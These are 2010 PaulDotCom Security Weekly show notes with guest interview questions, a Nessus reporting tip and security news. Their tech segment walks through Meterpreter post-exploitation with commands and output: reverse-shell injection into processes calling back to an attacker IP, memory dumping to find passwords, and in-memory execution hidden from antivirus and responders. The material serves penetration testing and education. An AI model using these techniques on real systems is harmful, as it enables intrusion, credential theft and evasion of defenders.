Sponsors & Announcements
PaulDotCom Security Weekly - Episode 218 - For Thursday November 4th, 2010.
- Register NOW for Blue Teams: "Don't Call It a Comeback" presentation with Core Security Technologies on Wednesday, November 17, 2010 2:00 pm EST
Guest Appearance: Bruce Potter
Fired up for Shmoocon 2011? We certainly are! Bruce will come on to tell us all about it, provide an update on the ticket purchasing process, web site issues, new venue, and more!
- We all love Shmoocon, and we can all agree it is one of the most well-run conferences out there. Tell us about some of the problems this week and the plan for ticket registrations.
- The barcode system will be the same, correct? Will there be a barcode contest like previous years?
- Tell us about the new venue.
- Are there any talks that have been confirmed yet?
- Any new contests?
- After last year, have you planned any differently in case of snow?
Guest Interview: Lars Ewe
Lars was last on Episode 176 (1 year ago)
Lars Ewe is a technology executive with broad background in application development and security, middleware infrastructure, software development and application/system manageability technologies. Throughout his career Lars has held key positions in engineering, product management, and sales in a variety of different markets. Prior to Cenzic, Lars was software development director at AMD, where he was responsible for AMD's overall systems manageability and security strategy.
- What are some of the web application vulnerabilities that are most difficult to detect using an automated tool and why?
- What are the top 2-3 things you can do to tune your automated scanner for the best results when scanning your web applications?
- At some point I started thinking that we've done a good job of raising awareness about web application security. Then I see reports like this: https://blogs.sans.org/appsecstreetfighter/2010/11/01/weekly-roundup-web-hacking-incidents-3/?utm_source=rss&utm_medium=rss&utm_campaign=weekly-roundup-web-hacking-incidents-3
- Why don't people secure their web applications? Is is a lack of awareness or knowledge or both? Or is it that their risk analysis is way off and most people still think, "Oh, its just the web site, there's no sensitive data there" and ignore the client infection via the web site attacks.
- With all of the Adobe Flash 0-days floating around, what can we do to identify vulnerabilities in Flash applications? Is HTML5 our saving grace?
- What can we do to improve the web application developer process with respects to security, try to educate the developers or give them tools that make it easier to write secure applications?
Mini Tech Segment: Nessus Vulnerabilities By IP Address
This is an extremely handy report to have. I remember using this report type long ago, and somewhere in the Nessus updates it was no longer provided. However, its back! Thanks to our awesome user community, and specifically Brian Olson. Brian created a stylesheet that lists each vulnerability found, and the IP addresses affected:
I like to create a filter for only the High level alerts, then use this report to review the results. To get the results you will need to copy the xsl file into your $Nessus_Home/var/www/nessus directory, then restart Nessus.
Tech Segment: "Executing from Memory" by Carlos Perez
In the recent conference of Hack3rcon I covered the different arid on a disk than a attacker can leave behind that a crafty System Administrator or a Incident Response Team can find to start a baseline off events taken on a box. One may be called to do a pentest for the only reason to test Incident Response procedures and to exercise the IR team as part of an engagement. Many AV and HIPS monitor disk activity to look for disk activity to check what was written and analyze it making life difficult when one has to upload tools, place secondary connections back as backup of the main session. When one is in this type of environment one Meterpreter has several features that make it an important tool to have. This features are:
- Memory Manipulation (Read and Write in a process memory)
- Execution of executables from memory
- Use of Windows API in the libraries and with Railgun.
This gives Meterpreter a good advantage in post-exploitation. All the regular commands in the Windows Version of Meterpreter run directly from memory no executable of the target is used to perform this tasks, only the necessary DLLs are loaded by the extensions. The same is done by Reailgun that permits an attacker to load systems DLL's in memory and use the functions on this DLL's to further extend Meterpreter capabilities. Now one of the biggest strengths that Metepreter has is the manipulation of memory on a target, this allows Meterpreter to manipulate the memory of it's own process or another process given a PID. Several Scripts exist for simplifying some of the tasks, some of this scripts are: 1. duplicate - For injecting a Meterpreter Reverse TCP Payload into a a process by name or PID, fi none is provided a notepad.exe process will be generated. 2. multi_meter_inject - For injecting on multiple processes a selected Meterpreter payload, you can specify names, pid's or a notepad.exe process will be generated for you. 3. process_memdump - for dumping a selected process by name or pid, you can also specify a list of processes in a text file and it will dump the memory for each one of those processes. Lets cover the duplicate script first, to see the options of all meterpreter scripts the -h option is used:
meterpreter > run duplicate -h OPTIONS: -D Disable the automatic multi/handler (use with -r to accept on another system) -P <opt> Process id to inject into; use instead of -e if multiple copies of one executable are running. -e <opt> Executable to inject into. Default notepad.exe, will fall back to spawn if not found. -h This help menu -p <opt> The port on the remote host where Metasploit is listening (default: 4546) -r <opt> The IP of a remote Metasploit listening for the connect back -s Spawn new executable to inject to. Only useful with -P. -w Write and execute an exe instead of injecting into a process
Very useful when you want to share a target with another consultant or test a connection to an external server. To generate a secondary session back your box you could just do:
meterpreter > run duplicate -r 192.168.17.1 [*] Creating a reverse meterpreter stager: LHOST=192.168.17.1 LPORT=4546 [*] Running payload handler [*] Current server process: meterpreter_hostonly.exe (3464) [*] Duplicating into notepad.exe... [+] [*] Injecting meterpreter into process ID 2828 [*] Allocated memory at address 0x00bf0000, for 290 byte stager [*] Writing the stager into memory... [*] New server process: 2828 meterpreter > [*] Meterpreter session 4 opened (192.168.17.1:4546 -> 192.168.17.128:1053) at 2010-11-04 16:01:32 -0400
Lets say we have a larger team and we would like to inject a session that would go to several of them we could use the multi_meter_inject script:
meterpreter > run multi_meter_inject -h Meterpreter Script for injecting a reverce tcp Meterpreter Payload in to memory of multiple PID's, if none is provided a notepad process. will be created and a Meterpreter Payload will be injected in to each. OPTIONS: -h Help menu. -m Start Exploit multi/hadler for return connection -mp <opt> Provide Multiple PID for connections separated by comma one per IP. -mr <opt> Provide Multiple IP Addresses for Connections separated by comma. -p <opt> The port on the remote host where Metasploit is listening (default: 4444) -pt <opt> Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp
Lets inject into 3 different existing PID's so as to minimize the chance of detection by starting a process:
meterpreter > run multi_meter_inject -mr 192.168.17.1,192.168.17.10,192.168.17.11 -mp 2984,3096,3104 [*] Creating a reverse meterpreter stager: LHOST=192.168.17.1 LPORT=4444 [*] Injecting meterpreter into process ID 2984 [*] Allocated memory at address 0x00b60000, for 290 byte stager [*] Writing the stager into memory... [+] Successfully injected Meterpreter in to process: 2984 [*] Sending stage (749056 bytes) to 192.168.17.128 [*] Meterpreter session 5 opened (192.168.17.1:4444 -> 192.168.17.128:1054) at 2010-11-04 16:11:15 -0400 [*] Creating a reverse meterpreter stager: LHOST=192.168.17.10 LPORT=4444 [*] Injecting meterpreter into process ID 3096 [*] Allocated memory at address 0x00c40000, for 290 byte stager [*] Writing the stager into memory... [+] Successfully injected Meterpreter in to process: 3096 [*] Creating a reverse meterpreter stager: LHOST=192.168.17.11 LPORT=4444 [*] Injecting meterpreter into process ID 3104 [*] Allocated memory at address 0x01be0000, for 290 byte stager [*] Writing the stager into memory... [+] Successfully injected Meterpreter in to process: 3104
Lets say you want to dump the memory of process to look for information, find passwords or all sorts of information, the script for this task is the process_memdump:
meterpreter > run process_memdump -h USAGE: EXAMPLE: run process_dump putty.exe EXAMPLE: run process_dump -p 1234 OPTIONS: -h Help menu. -n <opt> Name of process to dump. -p <opt> PID of process to dump. -q Query the size of the Process that would be dump in bytes. -r <opt> Text file wih list of process names to dump memory for, one per line. -t toggle location information in dump.
Lets find the notepad process, query the size of memory it is using and dump its memory:
meterpreter > ps Process list ============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 0 [System Process] 4 System x86 0 268 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 316 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 340 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 388 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 424 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 600 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe 616 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 700 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 760 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 812 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 828 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 976 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 1004 msdtc.exe x86 0 C:\WINDOWS\system32\msdtc.exe 1128 httpd.exe x86 0 NT AUTHORITY\SYSTEM C:\xampplite\apache\bin\httpd.exe 1160 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1276 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 1372 VMUpgradeHelper.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe 1552 httpd.exe x86 0 NT AUTHORITY\SYSTEM C:\xampplite\apache\bin\httpd.exe 2180 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 2252 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe 2328 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe 2664 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe 2984 explorer.exe x86 0 CARLOS-BA5A2E78\Administrator C:\WINDOWS\Explorer.EXE 3172 TPAutoConnect.exe x86 0 CARLOS-BA5A2E78\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe 2620 wuauclt.exe x86 0 CARLOS-BA5A2E78\Administrator C:\WINDOWS\system32\wuauclt.exe 3464 meterpreter_hostonly.exe x86 0 CARLOS-BA5A2E78\Administrator C:\Documents and Settings\Administrator\Desktop\meterpreter_hostonly.exe 732 notepad.exe x86 0 CARLOS-BA5A2E78\Administrator C:\WINDOWS\system32\notepad.exe meterpreter > run process_memdump -q -p 732 [*] size for notepad.exe in PID 732 is 4396K meterpreter > run process_memdump -p 732 [*] Dumping memory for notepad.exe [*] Dumping Memory of notepad.exe with PID: 732 [*] base size = 64 [*] base size = 128 [*] base size = 192 [*] base size = 440 [*] base size = 444 [*] base size = 512 [*] base size = 576 [*] base size = 640 [*] base size = 1664 [*] base size = 1728 [*] base size = 1856 [*] base size = 2176 [*] base size = 2496 [*] base size = 2560 [*] base size = 2624 [*] base size = 3392 ………………………….. [*] base size = 2097024 [*] Saving Dumped Memory to /Users/cperez/.msf3/logs/scripts/proc_memdump/192.168.17.128_notepad.exe_732_20101104.2953.dmp
Once we have the file we can parse it for information.
One feature rarely used is execution in memory of an executable, this works by uploading the executable to the memory space of a dummy executable executed to hide the executable process or it will run in the memory space of the process where Meterpreter is running in:
meterpreter > execute -f ./meterpreter_hostonly.exe -m -d cmd.exe [*] Sending stage (749056 bytes) to 192.168.17.128 Process 308 created. meterpreter > [*] Meterpreter session 6 opened (192.168.17.1:4444 -> 192.168.17.128:1057) at 2010-11-04 16:40:41 -0400
Here is the dummy cmd.exe process shown in PS:
308 cmd.exe x86 0 CARLOS-BA5A2E78\Administrator C:\WINDOWS\system32\cmd.exe
if we do a netstat -nao on the target box we will see the connection back:
TCP 192.168.17.128:1057 192.168.17.1:4444 ESTABLISHED 308
very useful if other type of executables are used and other dummy files or under the current process.
Stories For Discussion
- A solution to an old problem - No, not that kind. (uhhh, I have no idea…) Some time back I saw this article regarding hacking JBOSS with the JMX console, and I noted that they used a .war file specifically created to give them a command shell. Me, I wanted the .war file that they used and asked our readers for help. So, in my ongoing task of rebuilding my toolset after my change in employment, I rediscovered Laudanum from Secureideas. Guess what is there? yep, all the bits that you need for a jboss command shell, as well as other injectable files for ASP, Coldfusion, JSP and PHP. Expect more on this in the future :-)
- Powerpoint Karaoke Slides - [Larry] - Yes, here's a list of the infamous slides from Brucon. SlideShare, eh? Sounds like a chance to start doing your own…
- Break into e-mail, steal nekkid pics, post to Facebook - [Larry] - This gentleman allegedly breaches about 3200 e-mail accounts after trolling Facebook for info to security questions (remember those questions going around, Mr. Johnson?) he was able to grab naked pictures of women from 170 accounts and allegedly post them to face book. Aside form the questions of, "Why don't I know these women?" and " "170 of 3200 accounts sounds like really good odds?" or "Where is this guy's Facebook account?" how about asking some other things, such as the contents of your sent items, and coming up with better security questions or better methods altogether.
- Shodan and SCADA - [Larry] - Yet another reason SHODAN is awesome, even though it is dated information, it is still relevant. Nothing like using it to fingerprint and discover control systems directly connected to the internet (Noooo, that NEVER happens), using some fairly well known stuff such as vendor names and industry terms such as "PLC" in combination with some CIDR addresses. I think though, that digging into some deeper stuff would require sone decent knowledges of the devices, industry and vendors. Care to prove me wrong?
- Dead Drops or Drop Dead? - [Larry] - Share files via USB humb drive cemented in walls, etc. Sounds like a great idea for spies, and an art installation. How long until these start showing up with malware or with less than honorable intent. Sounds like an interesting use of a PHUCKED device instead of storage.
- Bruteforcing SSH Known_hosts Files - [pauldotcom] - Xavier provides us with a fantastic article and new tool that covers brute forcing the hashed known_hosts files. His Perl script, given an IP address or hostname template, it will hash the values, then compare them to the hashes in the known hosts files. This is great if you are performing forensics or on a pen test. For example, if I compromise a DMZ host I can gather the IP subnet info and discover the hosts in known_hosts providing just the subnet info (e.g. ./known_hosts_bruteforcer.pl -i -s 192.168.0.0)
- Shodan, SCADA, and good security advice - [pauldotcom] - It should come as no suprise that you can use Shodan to find SCADA devices, even narrowing by IP address and port, then keying in on terms like PLC. The big problem I see here is not even that these devices are on the Internet, but if they are they are likely to not be very locked down. Digital bond recommends not only putting them behind the firewall, but also Virtual Private Networks (VPNs) for remote access, Removing, disabling, or renaming any default system accounts, account loackout, requiring strong passwords, monitoring account creations. I'd also add keeping up with the latest firmware, scrapping passwords in exchange for keypairs, using encrypted managment protocols, and even port knocking. If your device can survive on the Internet, you are in great shape in terms of security.
- Checkpoint reboots UTM-1 for you - [pauldotcom] - I think that rebooting has positive effects. Windows for sure, runs so much better when I reboot it! OS X, same thing! However, due to a timer that will roll over every 13.6 years, every device rebooted. I think its great when a vendor helps you perform regular maintenance. I know several groups, such as Windows administrators, that would schedule maintenance and reboot servers once a week or so.
- Secure Rogue Development - The software security question, again - [pauldotcom] - Some interesting points in this article, including a new methodology for secure coding called "Rogue Secure Development".
- PaulDotCom Philisophical Moment - Some have said that we have created God in our minds to overcome our fear of death. Similar to how we have created compliance to overcome our fears of getting hacked. (Thanks to Ben)
- Detecting Firesheep - [pauldotcom] - Using scapy, the smart folks at Zscaler research have created a program to spoof the requests and fill up your Firesheep console. These guys are great, this is the type of defensive thinking that I'm all for, perfect example of offensive countermeasures.
- New attack targets HTTP - [pauldotcom] - this is very similar to slowlaris, except I've read that it is not-so-easily filtered. Could spell trouble for web sites for while, before people apply the patch. Of course, once the patch comes out, the tools will be create, carnage will ensue.
- Most people don't even know what a rootkit is - [Pauldotcom] - Its been 5 years since the Sony rootkit. I mean, on one hand, if you purchased a Celine Dion or Ricky Martin CD, you deserve it (Neil Diamond is is more than okay, I'm a huge fan! :) The quote that gets me is "Most people don't even know what a rootkit is, so why should they care about it" (Thomas Hesse, Sony BMG). Partly its our fault, we need to educate users beyond telling them "You have a rootkit, thats bad". On the other hand, we can't downplay the dangers just because a technical term like "rootkit" is used.
- Call to arms for http-enum.nse - [pauldotcom] - This is a fantastic script from Ron Bowes! It tortures web servers, enumerating directories and fingerprinting the web server and some of its web applications. The fingerprints file is a custom lua format that allows for it to do its job really well. Ron needs your help to populate the fingerprints file!